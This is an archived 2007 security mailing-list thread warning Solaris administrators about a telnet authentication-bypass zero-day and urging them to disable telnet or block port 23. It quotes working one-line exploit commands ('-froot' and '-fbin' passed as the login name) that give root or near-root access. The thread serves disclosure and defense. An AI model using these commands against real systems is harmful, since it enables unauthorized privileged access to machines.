[Dshield] Solaris Telnet 0-day (Important!)

Gadi Evron ge at linuxbox.org
Mon Feb 12 04:53:17 GMT 2007


>From HD Moore:
"but this bug isnt -froot, its -fanythingbutroot =P"

On Sun, 11 Feb 2007, K K wrote:

> On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> > If you run Solaris, please check if you got telnet enabled NOW. If you
> > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > telnet 0-day.
> >
> > telnet -l "-froot" [hostname]
> >
> > will give you root on many Solaris systems with default installs
> > We are still testing. Please use our contact form at
> > https://isc.sans.org/contact.html
> 
> On systems where the above fails with "Not on system console", don't
> assume that the machine is secure, because the following does work,
> and is one step from root:
> 
> telnet -l "-fbin" [hostname]
> 
> Gadi Evron <ge at linuxbox.org>  wrote:
> >. If Solaris 10 & 11 are truly vulnerable to this bug,
> > Sun deserves a  *swift* kick to the head.
> 
> The above is from my testing with Solaris 10, so get ready to start kicking...
> 
> Kevin
> _________________________________________
> 
> SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> taught by our top rated instructors plus a huge vendor tools expo.
> Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> 



More information about the list mailing list